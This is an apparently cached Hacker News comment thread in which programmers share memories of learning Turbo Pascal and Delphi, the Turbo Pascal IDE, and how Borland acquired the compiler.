Turbo Pascal was my first contact with compiled languages in school, after starting off with Commodore Basic as a kid and graduating to Amos and some other Amiga stuff later. TP was my first contact with real PCs, too. After school I moved to Delphi, which was basically a thin wrapper around the Win32 API with Object Pascal syntax and the nicest IDE I had ever used (and probably will ever use).

Delphi really paid my bills as a newbie commercial programmer. That was around the time when the internet took off, and I wrote my first CGI servers in Pascal to make dynamic websites. The Pascal/Delphi language and environment were incredibly versatile and you could write some really fast code with it.

Fond memories. In many ways, TP leveled me up as a programmer.

rottyguy 2 days ago 2 replies      
I was working at a software store during the mid-late 80's (Babbages if anyone knows it) and had a customer come in asking for a small, lightweight editor... You know like "turbo pascal but w/o the compiler part". First time I ever heard of it and, tbh, had no idea what he was talking about. I later used it to do some work for in my CS class (highschool was teaching programming via Pascal). It's a good language to learn after basic and before C/C++.

IIRC correctly, TP used a yellow font (well ascii) on a black background (default)? Didn't it also have some quick key combinations (I recall a ctrl+k for some reason but I'm sure it's just memory...)

junto 2 days ago 1 reply      
Turbo Pascal was the first language I was taught in school, although I had already taught myself BASIC on a BBC B Microcomputer as a child.

I loved Pascal and wrote a race management program for my local sailing club when I was 16. Fond memories. The whole experience was a voyage of discovery, as I had to write my own "windows" style UI using ASCII codes.

I used Delphi later on in university along with Modular2, and C++. I never felt the same passion for these languages as I had had for Turbo Pascal.

I later moved on to VB and VBscript, and didn't like them at all but they paid the bills.

The next time I felt that same type of passion was for C#. Somehow it just clicked. I think it is about what you can achieve productively with the language, as well as the language itself.

huhtenberg 2 days ago 1 reply      
> Anders Hejlsberg developed Blue Label Pascal... This compiler was later licensed by a software company Borland which added user interface and editor, changed the name to Turbo Pascal and offered it for a competitive price.

Nooo... Another account of TP origins was that it was written by Philippe Kahn (the founder of Borland), back when he was just a one-man operation running from a small office on top of a Jaguar car service shop. But apparently it wasn't. Damn.

swaits 2 days ago 1 reply      
Fans of Turbo Pascal, or more so Delphi, will be interested in Lazarus. http://www.lazarus-ide.org/
mahouse 2 days ago 1 reply      
       cached 14 September 2015 02:11:02 GMT